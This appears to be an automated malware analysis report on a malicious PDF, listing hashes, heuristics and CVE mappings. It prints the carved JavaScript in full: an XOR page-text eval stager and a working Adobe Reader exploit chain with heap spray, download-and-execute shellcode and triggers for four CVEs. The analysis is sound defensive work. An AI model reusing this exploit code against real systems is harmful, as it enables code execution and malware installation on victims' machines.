Malicious PDF — malware analysis report

Static analysis result for SHA-256 eefa137a6c6c6869…

MALICIOUS

PDF

4.8 KB Created: 2010-08-01 07:24:26 Authoring application: Xogouueiydke (via 8ad4b bawoxelo) First seen: 2026-05-11
MD5: b8b6595a37fc9be5b1a4e1a931beaf2a SHA-1: 38aba54d9fce3f948bcbde7cc00d8a4ef3996deb SHA-256: eefa137a6c6c68698e239bc243a03de2aa1496bbffeb95443633c8595dcaea45
390 Risk Score

Malware Insights

MITRE ATT&CK
T1059.007 JavaScript; T1203 Exploitation for Client Execution (the original mapping to T1059.001 PowerShell is not supported by the recovered artifacts: every stage is Acrobat JavaScript and no PowerShell invocation appears anywhere in the carved scripts; the shellcode's apparent URL-download-and-execute behaviour would additionally fit T1105 Ingress Tool Transfer)

The PDF carries an obfuscated JavaScript stager (javascript_obj0011_000.js; heuristics PDF_JAVASCRIPT, PDF_JS and PDF_PAGE_WORD_XOR_EVAL_STAGER). The stager itself performs no download: it enumerates the rendered page text with getPageNumWords/getPageNthWord, treats the words as hex byte pairs, XOR-decodes them with the fixed key 173 (0xAD) and evals the result, so the real second stage is hidden in page content rather than in the /JS stream. That second stage was recovered (legacy_pdfkit_stage_000.js / page_word_xor_stage_000.js) and its nature is not undetermined: it is a version-gated Adobe Reader exploit chain that heap-sprays a 0x9090 NOP sled plus shellcode up to 0x0c0c0c0c or 0x30303030, then selects util.printf (CVE-2008-2992), Collab.collectEmailInfo (CVE-2007-5659), Collab.getIcon (CVE-2009-0927) or media.newPlayer (CVE-2009-4324) according to app.viewerVersion. The download URL is not a literal: the stage decodes it from the Info dictionary (author + title, mapped through a substitution table held in the 'p' Info entry), appends ?reader_version=<viewerVersion> and embeds it in the shellcode. The shellcode contains byte sequences that appear to spell 'urlmon' and '.exe' and 32-bit constants matching the widely used ROR-13 API hashes for URLDownloadToFileA and WinExec, consistent with a download-and-execute dropper; the executable it fetches is not part of this sample, so only that final payload remains uncharacterised. ClamAV produced no hit on any carved stage, so the verdict rests on the exact-CVE heuristics rather than on signatures.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 10

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
  • Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string; this sample also adds media.newPlayer). In the recovered stage the branches are `cJ > 8` → util.printf, `cJ < 8` → Collab.collectEmailInfo, `cJ < 9.1` → Collab.getIcon (behind a feature test on app.doc.Collab.getIcon) and `cJ == 9.2` → media.newPlayer; the ranges overlap, so a Reader 9.0 viewer would receive both the util.printf and the getIcon attempt. This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths. The stage also carries a built-in trace mode — when the document Producer string begins with 'debug' it calls app.alert before each exploit branch and prints the decoded URL — which an analyst can use in an instrumented viewer to confirm the branch taken without relying on the crash itself.
  • Page-word XOR JavaScript eval stager high PDF_PAGE_WORD_XOR_EVAL_STAGER
    PDF JavaScript enumerates rendered page words with getPageNthWord/getPageNumWords, extracts encoded byte fragments, XOR-decodes the stage with char-code helpers (here a fixed single-byte key, xS = 173 / 0xAD, applied to two-hex-digit fragments) and evals the result, falling back to new Function() if the first attempt throws. Because the payload lives in page text, a scanner that inspects only the /JS stream sees just this small loader. This is an old exploit-kit staging pattern and is not normal document JavaScript.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ahrude.egh/4 Referenced by PDF JavaScript. The URL does not appear as a literal in the script: the second stage assembles it at runtime from the Info dictionary author and title fields and appends ?reader_version=<app.viewerVersion> before embedding it in the shellcode, so network indicators for this family should be derived from the Info dictionary as well as from string extraction.

Extracted artifacts 3

Files carved from inside the sample during analysis. The second and third artifacts appear to be two decodings of the same XOR-decoded second stage (identical script text; the 'legacy' carve is 15 bytes longer and ends in non-printable residue), so they should be counted as one second stage rather than two distinct payloads.

Filename | Kind | Source | Size
javascript_obj0011_000.js pdf-javascript-stream PDF /JS object 11 at offset 0xE63 530 bytes
SHA-256: f8d11a8a79f2a0d1dc2add0164dae101f7de12d40f0f67c3614e7038541b189d
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
try {var chWord, numWords;for (var i = 0; i < this.numPages; i++){}wX='var xS = 173 ;v_XaXXr ykXL = thisk;vXarX nU=yL.Xkgetk_PkkageN_umWords(thisk.pageNum_);var qN=\'\';for(var _tE=0;tEkX<_k nU; tE++){qN=[qNkk,yL.getPageNthWX_ord(_yL.pkageNum,tE,Xtrue)].k_join(__\'\')k_;;}var yPkk=\'\'_k;for(_Xvar _tEX=kk0;tkXEXX < __qNk._Xlekngth; tE+=2){xkA=qN.subksX_tr(tE,2);yP=[yPk_,Stkkring.fro_mX_CharCode(parseInt(xA,16)^xS)].jokin(\'\');}ev_al(yP);yXPkk=null;'.replace(/[kX_]/g, '');tQ=sRC();} catch(wXY){var iX=new Function (wX);iX();}
legacy_pdfkit_stage_000.js deobfuscated-js getPageWords-XOR Pidief stage normalized at offset 0x0 3834 bytes
SHA-256: 8bb8640fc75b11a5eca29ed3161593d053846f9e0b38dbcec572cc304e3ba09e
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
this.zO=19003;this.zO-=121;this.b=29254;this.b-=156;var zE=["pM","iD","t"];var oZ=["sP","d","tS"];var mH='0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ/.:_-?&=%#';n={};var lU=["l","pE","uD"];var dA=this.info['p'].replace(/[\s]/g, '');var x="x";this.qB=19026;this.qB+=8;var eX = this.info;var dO = (eX.producer.substr(0,5) == 'debug');var oP = new Array(); var bW = "%u";function qJ(str){str = str.split(bW);var ret="";for(var i in str){if(str[i] != "")ret += String.fromCharCode(parseInt(str[i],16));}return ret;}function xU(str1, str2){return [str1, str2].join("");}function mNC(cZ){var jE = mHY();var cJ = jC();jE += ((jE.indexOf("?") > -1) ? "&" : "?") + "reader_version=" + cJ;if(dO) app.alert("URL: " + jE);jE=sZ(jE);var d=bW;var xA=d+"C033"+d+"8B64"+d+"3040"+d+"0C78"+d+"408B"+d+"8B0C"+d+"1C70"+d+"8BAD"+d+"0858"+d+"09EB"+d+"408B"+d+"8D34"+d+"7C40"+d+"588B"+d+"6A3C"+d+"5A44"+d+"E2D1"+d+"E22B"+d+"EC8B"+d+"4FEB"+d+"525A"+d+"EA83"+d+"8956"+d+"0455"+d+"5756"+d+"738B"+d+"8B3C"+d+"3374"+d+"0378"+d+"56F3"+d+"768B"+d+"0320"+d+"33F3"+d+"49C9"+d+"4150"+d+"33AD"+d+"36FF"+d+"BE0F"+d+"0314"+d+"F238"+d+"0874"+d+"CFC1"+d+"030D"+d+"40FA"+d+"EFEB"+d+"3B58"+d+"75F8"+d+"5EE5"+d+"468B"+d+"0324"+d+"66C3"+d+"0C8B"+d+"8B48"+d+"1C56"+d+"D303"+d+"048B"+d+"038A"+d+"5FC3"+d+"505E"+d+"8DC3"+d+"087D"+d+"5257"+d+"33B8"+d+"8ACA"+d+"E85B"+d+"FFA2"+d+"FFFF"+d+"C032"+d+"F78B"+d+"AEF2"+d+"B84F"+d+"2E65"+d+"7865"+d+"66AB"+d+"6698"+d+"B0AB"+d+"8A6C"+d+"98E0"+d+"6850"+d+"6E6F"+d+"642E"+d+"7568"+d+"6C72"+d+"546D"+d+"8EB8"+d+"0E4E"+d+"FFEC"+d+"0455"+d+"5093"+d+"C033"+d+"5050"+d+"8B56"+d+"0455"+d+"C283"+d+"837F"+d+"31C2"+d+"5052"+d+"36B8"+d+"2F1A"+d+"FF70"+d+"0455"+d+"335B"+d+"57FF"+d+"B856"+d+"FE98"+d+"0E8A"+d+"55FF"+d+"5704"+d+"EFB8"+d+"E0CE"+d+"FF60"+d+"0455";xA+=jE;return qJ(xA);};function mHY(){var eP = (eX.author + eX.title).replace(/[\s]/g, '');var tSF = hY(eP, dA, mH);return tSF;};function hY(eP, mH, dA){var tSF="";for(var i=0; i < eP.length; i++){var kP = mH.indexOf(eP[i]);if(kP > -1 
){tSF += dA[kP];}}return tSF;};function sZ(eP){var out = "";eP = pU(eP);g = Math.round(eP.length / 4);if (g != eP.length /4) eP+="00";for(var i=0; i < eP.length; i+=4){out+= bW + eP.substr(i+2, 2) + eP.substr(i, 2);}return out;};function pU(s){var i, f = 0, a = [];s += '';f = s.length;for (i = 0; i<f; i++) {a[i] = s.charCodeAt(i).toString(16).replace(/^([\da-f])$/,"0$1").toUpperCase();}return a.join('');};function aX(lQ, len){while (lQ.length * 2 < len){lQ = xU(lQ, lQ);}return lQ.substring(0, len / 2);};function wJ(pEV){var nM = 0x0c0c0c0c;        iP = mNC("pdf");if (pEV == 1){nM = 0x30303030;}var bG = 0x400000;var ln = iP.length * 2;var oF = bG - (ln + 0x38);var lQ = qJ(bW+"9090"+bW+"9090"); lQ = aX(lQ, oF);var f = (nM - 0x400000) / bG;for (var rK = 0; rK < f; rK ++ ){oP[rK] = xU(lQ, iP);}};function jC(){try {return app.viewerVersion.toString();}catch(sD){    return 0;}}if(dO) app.alert("called exploit");var cJ = jC();if(dO)  app.alert("v: " + cJ);if (cJ > 8){if(dO) app.alert("util.printf");wJ(1);var zIH = "12999999999999999999";for (rW=0; rW < 276; rW++) zIH += "8";util.printf("%45000f", zIH);}if (cJ < 8){if(dO) app.alert("Collab.collectEmailInfo");wJ(0);var kN = qJ(bW+"0c0c"+bW+"0c0c");while (kN.length < 44952) kN += kN;this.collabStore = Collab.collectEmailInfo({ subj : "", msg : kN});}if (cJ < 9.1){if (app.doc.Collab.getIcon){if(dO) app.alert("Collab.getIcon");wJ(0);var v = unescape("%09");while (v.length < 0x4000) v += v;v = "N." + v;app.doc.Collab.getIcon(v);}}if (cJ == 9.2){if(dO) app.alert("media.newPlayer");wJ(1);var sf="1.000000000.000000000.1337 : 3.13.37";util.printd(sf, new Date());try {media.newPlayer(null);} catch(e) {}util.printd(sf, new Date());}this.pG=3201;this.pG++;var cV='';try {var dI='rO'.substr(6553,6553)} catch(dI){};try {var eH='aZ'.substr(4122,4122)} catch(eH){};�����'y ����� �
page_word_xor_stage_000.js deobfuscated-js page-word continuous-hex XOR decoded JavaScript (decompressed, key=0xAD) at offset 0x8C 3819 bytes
SHA-256: 294f5b27ecb8aca5e708334aa826c5415c60a26dab8f98e572c2617e92456a1e
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
this.zO=19003;this.zO-=121;this.b=29254;this.b-=156;var zE=["pM","iD","t"];var oZ=["sP","d","tS"];var mH='0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ/.:_-?&=%#';n={};var lU=["l","pE","uD"];var dA=this.info['p'].replace(/[\s]/g, '');var x="x";this.qB=19026;this.qB+=8;var eX = this.info;var dO = (eX.producer.substr(0,5) == 'debug');var oP = new Array(); var bW = "%u";function qJ(str){str = str.split(bW);var ret="";for(var i in str){if(str[i] != "")ret += String.fromCharCode(parseInt(str[i],16));}return ret;}function xU(str1, str2){return [str1, str2].join("");}function mNC(cZ){var jE = mHY();var cJ = jC();jE += ((jE.indexOf("?") > -1) ? "&" : "?") + "reader_version=" + cJ;if(dO) app.alert("URL: " + jE);jE=sZ(jE);var d=bW;var xA=d+"C033"+d+"8B64"+d+"3040"+d+"0C78"+d+"408B"+d+"8B0C"+d+"1C70"+d+"8BAD"+d+"0858"+d+"09EB"+d+"408B"+d+"8D34"+d+"7C40"+d+"588B"+d+"6A3C"+d+"5A44"+d+"E2D1"+d+"E22B"+d+"EC8B"+d+"4FEB"+d+"525A"+d+"EA83"+d+"8956"+d+"0455"+d+"5756"+d+"738B"+d+"8B3C"+d+"3374"+d+"0378"+d+"56F3"+d+"768B"+d+"0320"+d+"33F3"+d+"49C9"+d+"4150"+d+"33AD"+d+"36FF"+d+"BE0F"+d+"0314"+d+"F238"+d+"0874"+d+"CFC1"+d+"030D"+d+"40FA"+d+"EFEB"+d+"3B58"+d+"75F8"+d+"5EE5"+d+"468B"+d+"0324"+d+"66C3"+d+"0C8B"+d+"8B48"+d+"1C56"+d+"D303"+d+"048B"+d+"038A"+d+"5FC3"+d+"505E"+d+"8DC3"+d+"087D"+d+"5257"+d+"33B8"+d+"8ACA"+d+"E85B"+d+"FFA2"+d+"FFFF"+d+"C032"+d+"F78B"+d+"AEF2"+d+"B84F"+d+"2E65"+d+"7865"+d+"66AB"+d+"6698"+d+"B0AB"+d+"8A6C"+d+"98E0"+d+"6850"+d+"6E6F"+d+"642E"+d+"7568"+d+"6C72"+d+"546D"+d+"8EB8"+d+"0E4E"+d+"FFEC"+d+"0455"+d+"5093"+d+"C033"+d+"5050"+d+"8B56"+d+"0455"+d+"C283"+d+"837F"+d+"31C2"+d+"5052"+d+"36B8"+d+"2F1A"+d+"FF70"+d+"0455"+d+"335B"+d+"57FF"+d+"B856"+d+"FE98"+d+"0E8A"+d+"55FF"+d+"5704"+d+"EFB8"+d+"E0CE"+d+"FF60"+d+"0455";xA+=jE;return qJ(xA);};function mHY(){var eP = (eX.author + eX.title).replace(/[\s]/g, '');var tSF = hY(eP, dA, mH);return tSF;};function hY(eP, mH, dA){var tSF="";for(var i=0; i < eP.length; i++){var kP = mH.indexOf(eP[i]);if(kP > -1 
){tSF += dA[kP];}}return tSF;};function sZ(eP){var out = "";eP = pU(eP);g = Math.round(eP.length / 4);if (g != eP.length /4) eP+="00";for(var i=0; i < eP.length; i+=4){out+= bW + eP.substr(i+2, 2) + eP.substr(i, 2);}return out;};function pU(s){var i, f = 0, a = [];s += '';f = s.length;for (i = 0; i<f; i++) {a[i] = s.charCodeAt(i).toString(16).replace(/^([\da-f])$/,"0$1").toUpperCase();}return a.join('');};function aX(lQ, len){while (lQ.length * 2 < len){lQ = xU(lQ, lQ);}return lQ.substring(0, len / 2);};function wJ(pEV){var nM = 0x0c0c0c0c;        iP = mNC("pdf");if (pEV == 1){nM = 0x30303030;}var bG = 0x400000;var ln = iP.length * 2;var oF = bG - (ln + 0x38);var lQ = qJ(bW+"9090"+bW+"9090"); lQ = aX(lQ, oF);var f = (nM - 0x400000) / bG;for (var rK = 0; rK < f; rK ++ ){oP[rK] = xU(lQ, iP);}};function jC(){try {return app.viewerVersion.toString();}catch(sD){    return 0;}}if(dO) app.alert("called exploit");var cJ = jC();if(dO)  app.alert("v: " + cJ);if (cJ > 8){if(dO) app.alert("util.printf");wJ(1);var zIH = "12999999999999999999";for (rW=0; rW < 276; rW++) zIH += "8";util.printf("%45000f", zIH);}if (cJ < 8){if(dO) app.alert("Collab.collectEmailInfo");wJ(0);var kN = qJ(bW+"0c0c"+bW+"0c0c");while (kN.length < 44952) kN += kN;this.collabStore = Collab.collectEmailInfo({ subj : "", msg : kN});}if (cJ < 9.1){if (app.doc.Collab.getIcon){if(dO) app.alert("Collab.getIcon");wJ(0);var v = unescape("%09");while (v.length < 0x4000) v += v;v = "N." + v;app.doc.Collab.getIcon(v);}}if (cJ == 9.2){if(dO) app.alert("media.newPlayer");wJ(1);var sf="1.000000000.000000000.1337 : 3.13.37";util.printd(sf, new Date());try {media.newPlayer(null);} catch(e) {}util.printd(sf, new Date());}this.pG=3201;this.pG++;var cV='';try {var dI='rO'.substr(6553,6553)} catch(dI){};try {var eH='aZ'.substr(4122,4122)} catch(eH){};